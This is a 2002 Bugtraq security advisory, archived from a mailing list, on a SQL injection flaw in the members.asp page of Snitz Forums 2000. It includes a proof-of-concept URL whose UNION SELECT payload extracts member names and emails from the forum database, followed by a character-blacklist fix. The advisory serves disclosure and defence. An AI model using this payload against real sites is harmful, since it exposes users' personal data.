Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Snitz Forums 2000 remote SQL query manipulation vulnerability

From: acemi <acemi_5 () yahoo com>
Date: 19 Apr 2002 21:06:46 -0000


vulnerable
----------
Product : Snitz Forums 2000
Version :
3.3
3.3.01
3.3.02
3.3.03 (last stable version)
Object  : members.asp
Class   : Input validation error (remote SQL query 
manipulation vulnerability)
Vendor-URL     : http://forum.snitz.com/
Vendor-Status  : informed, not patched
Remote-Exploit : yes


Introduction
------------
Snitz Forums 2000 is open source ASP-based web 
forum software. It runs on Microsoft Windows 
operating systems. A vulnerability exists in Snitz 
Forums 2000 which makes it possible for a malicious 
user to remotely manipulate the logic of SQL queries. 
As a result, it may be possible for attackers to view all 
data in the forum's database. This vulnerability can 
be exploited with a web browser.

More Details
------------
In members.asp page, when listing the members 
with a criteria, the input (M_NAME) is not checked for 
malicious code. As a result, an attacker can add 
extra SELECT statement to the query with UNION 
and he/she can view any data in the forum's 
database. 


Proof-of-concept
----------------
Normally, to view the members' list whose 
membername start with 'A', members.asp page is 
used as the following: 

/members.asp?
mode=search&M_NAME=A&initial=1&method=


Use this link to view the vulnerability:

/members.asp?mode=search&M_NAME=XXXX%
25')%20UNION%20SELECT%20MEMBER_ID,%
20M_STATUS,%20M_NAME%20%2B%20'/'%20%
2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%
20M_EMAIL,%20M_COUNTRY,%
20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%
20M_AIM,%20M_TITLE,%20M_POSTS,%
20M_LASTPOSTDATE,%20M_LASTHEREDATE,%
20M_DATE,%20M_STATE%20FROM%
20FORUM_MEMBERS%20WHERE%20(M_NAME%
20LIKE%20'&initial=1&method=

MEMBERNAME column will be 
MEMBERNAME/EMAIL/ column.


Temporary fix
-------------
To fix this bug, in members.asp , change the 
following lines :

SearchName = Request("M_NAME")
if SearchName = "" then
SearchName = Request.Form("M_NAME")
end if


with :

if IsValidString(Request("M_NAME")) then
SearchName = Request("M_NAME")
end if

if SearchName = "" then
if IsValidString(Request.Form("M_NAME")) then
SearchName = Request.Form("M_NAME")
end if
end if


and in function IsValidString(sValidate) in 
inc_functions.asp , change the following line:

sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"

with :

sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"
Previous By Date Next
Previous By Thread Next

Current thread: